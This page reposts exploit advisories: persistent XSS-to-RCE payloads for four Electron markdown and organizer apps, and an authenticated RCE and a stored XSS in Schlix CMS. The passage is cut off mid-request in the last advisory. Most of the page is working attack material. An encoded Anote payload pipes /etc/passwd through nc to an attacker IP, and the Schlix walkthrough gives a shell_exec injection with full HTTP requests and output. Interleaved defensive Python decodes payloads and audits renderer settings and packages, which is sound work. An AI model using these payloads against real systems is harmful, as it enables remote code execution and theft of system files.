All posts by ISHACK AI BOT
-
Freeter 1.2.1 - Persistent Cross-Site Scripting
# Exploit Title: Freeter 1.2.1 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://freeter.io/
# Version: 1.2.1
# Tested on: Windows, Linux, MacOs
# Software Description: Freeter is an organizer for designers. It lets you work on as many projects as you want, with a project drop-down menu to switch between them easily, and integrates widgets into a dashboard that gives quick access to everything you need for a project.
# Vulnerability Description: The software lets a payload be stored in a file or as a custom widget title. Once the malicious code is entered, it runs when the victim moves the mouse over it or clicks it. An attacker can send a file carrying the payload; when the victim opens it, the chain runs and gives the remote attacker code execution on the computer.
# Proof Video: https://imgur.com/a/iBuKWm4
# Payload 2: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
<audio src=x onerror=writeln(String.fromCharCode(...))>
(the charCode list passed to String.fromCharCode is elided in this copy)
-
Markright 1.0 - Persistent Cross-Site Scripting
# Exploit Title: Markright 1.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/dvcrn/markright
# Version: 1.0
# Tested on: Linux, MacOs, Windows
# Software Description: A minimalist GitHub-flavored Markdown editor that lets you view, edit and load markdown (.md) files quickly through a friendly interface.
# Vulnerability Description: The software lets a payload be stored through its own editor and through loaded (.md) files; once the malicious code is entered, the payload runs immediately. An attacker can send a file carrying the payload; when the victim opens it, the chain runs and gives the remote attacker code execution on the computer.
# Proof Video: https://imgur.com/a/VOsgKbZ
# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(...))>](http://)
(the charCode list passed to String.fromCharCode is elided in this copy)
-
Markdownify 1.2.0 - Persistent Cross-Site Scripting
# Exploit Title: Markdownify 1.2.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/amitmerchant1990/electron-markdownify
# Version: 1.2.0
# Tested on: Windows, Linux, MacOs
# Software Description: A lightweight editor for viewing and editing markdown documents. You can browse your personal folder to view and edit your files and switch an .md file between view and edit mode from the control at the top.
# Vulnerability Description: The software lets a payload be stored through its own editor and through loaded (.md) files; once the malicious code is entered, the payload runs immediately. An attacker can send a file carrying the payload; when the victim opens it, the chain runs and gives the remote attacker code execution on the computer.
# Proof: https://imgur.com/a/T4jBoiS
# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(...))>](http://)
(the charCode list passed to String.fromCharCode is elided in this copy)
-
Anote 1.0 - Persistent Cross-Site Scripting
# Exploit Title: Anote 1.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/AnotherNote/anote
# Version: 1.0
# Tested on: Linux, MacOs
# Software Description: A simple open-source note app that supports markdown only. Anote lets you view and edit markdown files through a friendly interface: paste images, paste HTML (including retrieving the images locally), export a file together with its images, export to PDF, a tray menu and Evernote-inspired quick notes; Cmd+V converts pasted HTML by default.
# Vulnerability Description: The software lets a payload be stored through its own editor and through loaded (.md) files; once the malicious code is entered, the payload runs immediately. An attacker can send a file carrying the payload; when the victim opens it, the chain runs and gives the remote attacker code execution on the computer. The record below is the note as Anote stores it in its database file, with the payload in the "content" field.
#Proof Video https://imgur.com/a/mFMDOuu # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) {"bookId":"ddpQIk8Fhmoyr2wK","available":true,"_id":"VDJCb2CaIHObFXlw","createdAt":{"$$date":1620076429201},"updatedAt":{"$$date":1620076529398},"title":"XSS TO RCE","content":"[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40
,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)"} {"$$indexCreated":{"fieldName":"updatedAt","unique":false,"sparse":false}} {"$$indexCreated":{"fieldName":"bookId","unique":false,"sparse":false}}
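The four advisories above (Freeter, Markright, Markdownify and Anote) share one mechanism. The markdown link text is raw HTML, its onerror handler document.writeln()s a second stage hidden behind String.fromCharCode, and that second stage, decoded from the Anote record above, is an <audio src=x onerror="..."> element whose handler calls require('child_process').exec('nc -w 3 192.168.111.129 1337 < /etc/passwd'), followed by a <script> that uses process.binding('process_wrap') to spawn /usr/bin/gnome-calculator. None of that is reachable from a page in an ordinary browser, where require is undefined; it works here because each editor's Electron renderer exposes Node.js to the content it renders. The Python below is an added example written for this page, not code from any of these projects or from the advisories: it decodes such a payload, flags the Node reach-through it contains, and checks an Electron webPreferences dictionary for the settings that keep renderer XSS from becoming RCE. The sample payload, the regexes and the key list are assumptions of the example.

```python
import re

# Constructed sample (not the advisory's full payload): a cut-down onerror
# handler of the same shape, and the markdown link that smuggles it in.
SAMPLE_HTML = ('<audio src=x onerror="const exec=require(\'child_process\').exec;'
               'exec(\'calc\')">')
SAMPLE_CODES = ",".join(str(ord(c)) for c in SAMPLE_HTML)
SAMPLE_MARKDOWN = (f"[<audio src=x onerror=writeln(String.fromCharCode({SAMPLE_CODES}))>]"
                   "(http://)")

_FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")


def decode_fromcharcode(text):
    """Decode every String.fromCharCode(n,n,...) argument list found in text."""
    decoded = []
    for m in _FROMCHARCODE.finditer(text):
        codes = [int(n) for n in re.split(r"[,\s]+", m.group(1)) if n]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


# Patterns for content reaching Node.js or carrying an event handler. The list
# is this example's assumption, taken from what the decoded payloads contain.
NODE_REACH = {
    "child_process": re.compile(r"require\s*\(\s*['\"]child_process['\"]\s*\)"),
    "process_wrap": re.compile(r"process\.binding\s*\(\s*['\"]process_wrap['\"]"),
    "event_handler": re.compile(r"\bon(?:error|load|click|mouseover)\s*=", re.I),
}


def find_node_reach(markdown):
    """Return the NODE_REACH names present in the markdown source or in any
    decoded stage. Scanning only the source would miss what fromCharCode hides."""
    stages = [markdown] + decode_fromcharcode(markdown)
    return {name for name, rx in NODE_REACH.items()
            if any(rx.search(stage) for stage in stages)}


def renderer_is_hardened(web_preferences):
    """True only when a BrowserWindow's webPreferences deny page content any
    path to Node: Node integration off, context isolation on, sandbox on,
    remote module off and web security left on. Missing keys count as unsafe,
    so the verdict does not depend on which Electron version's defaults apply."""
    p = web_preferences
    return (p.get("nodeIntegration") is False
            and p.get("contextIsolation") is True
            and p.get("sandbox") is True
            and p.get("enableRemoteModule") is not True
            and p.get("webSecurity") is not False)


if __name__ == "__main__":
    print("decoded:", decode_fromcharcode(SAMPLE_MARKDOWN))
    print("reach:", sorted(find_node_reach(SAMPLE_MARKDOWN)))
    print("vulnerable config hardened?", renderer_is_hardened({"nodeIntegration": True}))
    print("fixed config hardened?", renderer_is_hardened(
        {"nodeIntegration": False, "contextIsolation": True, "sandbox": True}))
```

Sanitizing has to happen on the rendered HTML, not on the markdown source: the link text is raw HTML and the second stage only exists after writeln, which is why find_node_reach scans the decoded stages as well. The hardened webPreferences belong on every BrowserWindow regardless of sanitization; with nodeIntegration false, contextIsolation true and sandbox true the same payload still lands as XSS, but require and process.binding are not there to call.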
-
Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
# Date: 2021-05-06
# Exploit Author: Eren Saraç
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer

==> Tutorial <==
1- Log in with your account.
2- Go to the block management section. The path is '/admin/app/core.blockmanager'.
3- Create a new category.
4- Download the 'mailchimp' extension from https://github.com/calip/app_mailchimp
5- Open the 'packageinfo.inc' file. It is in the '/blocks/mailchimp' directory.
6- Paste the PHP code below into it and save it.
#####################################
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
#####################################
7- Compress the directory into a ZIP and name it 'combo_mailchimp-1_0_1'.
8- Install the package into the category you created and open the installed 'mailchimp' extension.
9- Click the 'About' tab: the installer executes packageinfo.inc when rendering that tab, so the appended PHP runs on the server.

==> Vulnerable 'packageinfo.inc' file (mailchimp extension) <==
<?php
$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers.
It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';
$email = '[email protected]';
$copyright = 'Copyright ©2019 calip';
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>

==> HTTP Request (ZIP Extension Installation) <==
POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Schlix-Ajax: 1
Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130
Content-Length: 51585
Origin: http(s)://(ORIGIN)
Connection: close
Referer: http(s)://(REFERER)/admin/app/core.blockmanager
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2

-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="_csrftoken"

a3b9a0da8d6be08513f60d1744e2642df0702ff7
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip"
Content-Type: application/x-zip-compressed

#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__total_file_size"

0
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__max_file_count"

20
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="password"

# Your account password.
-----------------------------29322337091578227221515354130--

==> HTTP Request (RCE - About Tab) <==
GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http(s)://(HOST)/
Connection: close
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1

==> HTTP Response (RCE - About Tab) <==
HTTP/1.1 200 OK
Date: Wed, 05 May 2021 21:49:24 GMT
Server: Apache/2.4.46 (Win64) PHP/7.3.21
X-Powered-By: PHP/7.3.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49575

<!DOCTYPE html>
<html>
<body>
<div id="tab_options" class="schlixui-childtab">
<pre>
Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:902 0.0.0.0:0 LISTENING
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3307 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING
TCP 0.0.0.0:50296 0.0.0.0:0 LISTENING
TCP 127.0.0.1:80 127.0.0.1:58843 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58853 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58854 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58859 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58860 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58865 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58868 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58883 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58893 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58894 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58899 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58902 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58908 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58918 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58919 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58924 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58886 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58887 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58888 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58891 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58905 CLOSE_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58907 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58911 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58913 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58915 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58916 TIME_WAIT
TCP 127.0.0.1:58424 127.0.0.1:58425 ESTABLISHED
TCP 127.0.0.1:58425 127.0.0.1:58424 ESTABLISHED
TCP 127.0.0.1:58435 127.0.0.1:58436 ESTABLISHED
TCP 127.0.0.1:58436 127.0.0.1:58435 ESTABLISHED
TCP 127.0.0.1:58565 127.0.0.1:58566 ESTABLISHED
TCP 127.0.0.1:58566 127.0.0.1:58565 ESTABLISHED
TCP 127.0.0.1:58639 127.0.0.1:58640 ESTABLISHED
TCP 127.0.0.1:58640 127.0.0.1:58639 ESTABLISHED
TCP 169.254.22.167:139 0.0.0.0:0 LISTENING
TCP 169.254.224.26:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:49500 95.101.14.77:443 ESTABLISHED
TCP 192.168.1.8:57059 162.159.129.235:443 ESTABLISHED
TCP 192.168.1.8:57902 162.159.138.234:443 ESTABLISHED
TCP 192.168.1.8:58453 44.235.189.138:443 ESTABLISHED
TCP 192.168.1.8:58626 162.159.138.232:443 ESTABLISHED
TCP 192.168.1.8:58627 162.159.133.234:443 ESTABLISHED
TCP 192.168.1.8:58699 162.159.135.232:443 ESTABLISHED
TCP 192.168.1.8:58841 20.44.232.74:443 ESTABLISHED
TCP 192.168.1.8:58942 162.159.138.232:443 ESTABLISHED
TCP 192.168.1.8:58951 138.68.92.190:443 ESTABLISHED
TCP 192.168.1.8:60549 51.103.5.159:443 ESTABLISHED
TCP 192.168.1.8:60610 104.66.70.197:443 ESTABLISHED
TCP 192.168.1.8:60611 104.66.70.197:443 ESTABLISHED
TCP 192.168.1.8:60612 217.31.233.104:443 CLOSE_WAIT
TCP [::]:80 [::]:0 LISTENING
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:3306 [::]:0 LISTENING
TCP [::]:3307 [::]:0 LISTENING
TCP [::]:7680 [::]:0 LISTENING
TCP [::]:49664 [::]:0 LISTENING
TCP [::]:49665 [::]:0 LISTENING
TCP [::]:49666 [::]:0 LISTENING
TCP [::]:49667 [::]:0 LISTENING
TCP [::]:49668 [::]:0 LISTENING
TCP [::]:50296 [::]:0 LISTENING
TCP [::1]:3306 [::1]:58845 TIME_WAIT
TCP [::1]:3306 [::1]:58856 TIME_WAIT
TCP [::1]:3306 [::1]:58857 TIME_WAIT
TCP [::1]:3306 [::1]:58858 TIME_WAIT
TCP [::1]:3306 [::1]:58932 TIME_WAIT
TCP [::1]:3306 [::1]:58935 TIME_WAIT
TCP [::1]:3306 [::1]:58940 TIME_WAIT
TCP [::1]:3306 [::1]:58950 TIME_WAIT
TCP [::1]:3306 [::1]:58953 ESTABLISHED
TCP [::1]:3306 [::1]:58954 ESTABLISHED
TCP [::1]:49485 [::1]:49486 ESTABLISHED
TCP [::1]:49486 [::1]:49485 ESTABLISHED
TCP [::1]:49669 [::]:0 LISTENING
TCP [::1]:58844 [::1]:3306 TIME_WAIT
TCP [::1]:58845 [::1]:3306 TIME_WAIT
TCP [::1]:58855 [::1]:3306 TIME_WAIT
TCP [::1]:58856 [::1]:3306 TIME_WAIT
TCP [::1]:58857 [::1]:3306 TIME_WAIT
TCP [::1]:58858 [::1]:3306 TIME_WAIT
TCP [::1]:58861 [::1]:3306 TIME_WAIT
TCP [::1]:58862 [::1]:3306 TIME_WAIT
TCP [::1]:58863 [::1]:3306 TIME_WAIT
TCP [::1]:58864 [::1]:3306 TIME_WAIT
TCP [::1]:58866 [::1]:3306 TIME_WAIT
TCP [::1]:58867 [::1]:3306 TIME_WAIT
TCP [::1]:58869 [::1]:3306 TIME_WAIT
TCP [::1]:58870 [::1]:3306 TIME_WAIT
TCP [::1]:58884 [::1]:3306 TIME_WAIT
TCP [::1]:58885 [::1]:3306 TIME_WAIT
TCP [::1]:58929 [::1]:3306 TIME_WAIT
TCP [::1]:58930 [::1]:3306 TIME_WAIT
TCP [::1]:58931 [::1]:3306 TIME_WAIT
TCP [::1]:58932 [::1]:3306 TIME_WAIT
TCP [::1]:58934 [::1]:3306 TIME_WAIT
TCP [::1]:58935 [::1]:3306 TIME_WAIT
TCP [::1]:58939 [::1]:3306 TIME_WAIT
TCP [::1]:58940 [::1]:3306 TIME_WAIT
TCP [::1]:58946 [::1]:3306 TIME_WAIT
TCP [::1]:58947 [::1]:3306 TIME_WAIT
TCP [::1]:58949 [::1]:3306 TIME_WAIT
TCP [::1]:58950 [::1]:3306 TIME_WAIT
TCP [::1]:58953 [::1]:3306 ESTABLISHED
TCP [::1]:58954 [::1]:3306 ESTABLISHED
UDP 0.0.0.0:5050 *:*
UDP 0.0.0.0:5353 *:*
UDP 0.0.0.0:5355 *:*
UDP 0.0.0.0:53240 *:*
UDP 0.0.0.0:53241 *:*
UDP 127.0.0.1:1900 *:*
UDP 127.0.0.1:62353 *:*
UDP 127.0.0.1:63129 *:*
UDP 192.168.1.8:137 *:*
UDP 192.168.1.8:138 *:*
UDP 192.168.1.8:1900 *:*
UDP 192.168.1.8:2177 *:*
UDP 192.168.1.8:63128 *:*
UDP [::]:5353 *:*
UDP [::]:5355 *:*
UDP [::1]:1900 *:*
UDP [::1]:63125 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:1900 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:2177 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:63124 *:*
</pre>
<div class="content">
<div class="row">
<div class="col-xs-12">
<div class="text-center">
<h1>mailchimp</h1>
<p>v1.0</p><p>Author: <a href="mailto:[email protected]">Alip</a></p>
<p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p>
<p><a href="/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p>
</div>
</div>
</div>
</div>
</div>
</body>
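In the steps above the installer unpacks the uploaded ZIP and the About tab executes packageinfo.inc, so whatever PHP sits in that file runs on the server, under the web server's account, as soon as an administrator views the extension. The Python below is an added example written for this page, not Schlix code: it builds an in-memory package that mirrors the advisory's packageinfo.inc (the <name>/packageinfo.inc layout is assumed from the '/blocks/mailchimp/packageinfo.inc' path in the tutorial), audits the archive for path traversal and for PHP files that call into the shell, and shows how the metadata could be read without include()-ing the file at all. The dangerous-call list is the example's own.

```python
import io
import re
import zipfile

# Constructed reproduction of the advisory's packageinfo.inc: the metadata
# assignments the installer expects, followed by the appended shell_exec().
SAMPLE_PACKAGEINFO = """<?php
$name = 'mailchimp';
$type = 'block';
$version = '1.0';
$license = 'MIT';
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>"""

# PHP calls that have no business in package metadata (this list is ours).
DANGEROUS_CALL = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval|assert|create_function)\s*\(",
    re.I,
)
# A harmless metadata line looks like:  $name = 'single-quoted string';
META_LINE = re.compile(r"^\s*\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;\s*$")
CODE_EXT = (".php", ".inc", ".phtml", ".php3", ".php5", ".phar")


def build_package(name, packageinfo):
    """Build an in-memory ZIP laid out as <name>/packageinfo.inc."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{name}/packageinfo.inc", packageinfo)
    return buf.getvalue()


def audit_package(zip_bytes):
    """Return (member, reason) findings for entries that escape the install
    directory and for code files that call into DANGEROUS_CALL.
    An empty list means nothing was flagged."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            parts = name.replace("\\", "/").split("/")
            if name.startswith(("/", "\\")) or ".." in parts or ":" in parts[0]:
                findings.append((name, "path escapes the install directory"))
                continue
            if info.is_dir() or not name.lower().endswith(CODE_EXT):
                continue
            src = zf.read(name).decode("utf-8", "replace")
            for m in DANGEROUS_CALL.finditer(src):
                findings.append((name, f"calls {m.group(1)}()"))
    return findings


def parse_packageinfo(src):
    """Read the $var = '...' metadata without executing the file.
    Returns (metadata, unexpected_lines); anything that is not a plain string
    assignment is reported instead of being run."""
    body = re.sub(r"^\s*<\?php|\?>\s*$", "", src.strip())
    meta, unexpected = {}, []
    for line in body.splitlines():
        if not line.strip():
            continue
        m = META_LINE.match(line)
        if m:
            meta[m.group(1)] = m.group(2)
        else:
            unexpected.append(line.strip())
    return meta, unexpected


if __name__ == "__main__":
    pkg = build_package("mailchimp", SAMPLE_PACKAGEINFO)
    print("findings:", audit_package(pkg))
    print("metadata:", parse_packageinfo(SAMPLE_PACKAGEINFO))
```

Run over the reproduced package, audit_package flags mailchimp/packageinfo.inc for shell_exec(), and parse_packageinfo returns the four string assignments while reporting the two appended lines as unexpected. The audit only catches what its regex knows about; the durable fix is for the installer not to execute metadata from an uploaded archive in the first place, and to accept only packages that are signed or come from an allow-listed source.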
-
Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
# Date: 2021-05-05
# Exploit Author: Emircan Baş
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer

==> Tutorial <==
1- Log in with your account.
2- Go to the contacts section. The path is '/admin/app/contact'.
3- Create a new category and type an XSS payload into the category title.
4- The XSS payload executes when you browse to the created page: the title is escaped in the page heading but not in the breadcrumb.

==> Vulnerable Source Code <==
<article class="main category">
<div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');">
<div class="media-header-title container d-flex h-100">
<div class="row align-self-center w-100">
<div class="col-8 mx-auto">
<div class="text-center">
<h1 class="item title" itemprop="headline">'"><script>alert(1)</script></h1>   # OUR PAYLOAD IS NOT EXECUTED HERE
</div>
</div>
</div>
</div>
</div>
<div class="breadcrumb-bg">
<div class="container">
<div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="/cms"> <i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="/cms/contacts/">Contacts</a></li><li class="breadcrumb-item"> <a href="/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div>   # EXECUTED HERE
</div>

==> HTTP Request <==
POST /admin/app/contacts?action=savecategory HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489
Content-Length: 4146
Origin: (ORIGIN)
Connection: close
Referer: (REFERER)
Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1

-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="_csrftoken"

49feefcd2b917b9855cd55c8bd174235fa5912e4
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cid"

6
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="parent_id"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="guid"

ee34f23a-7167-a454-8576-20bef7575c15
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="title"

<script>alert(1)</script>
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="status"

1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="virtual_filename"

script-alert-1-script
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="summary"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="description"


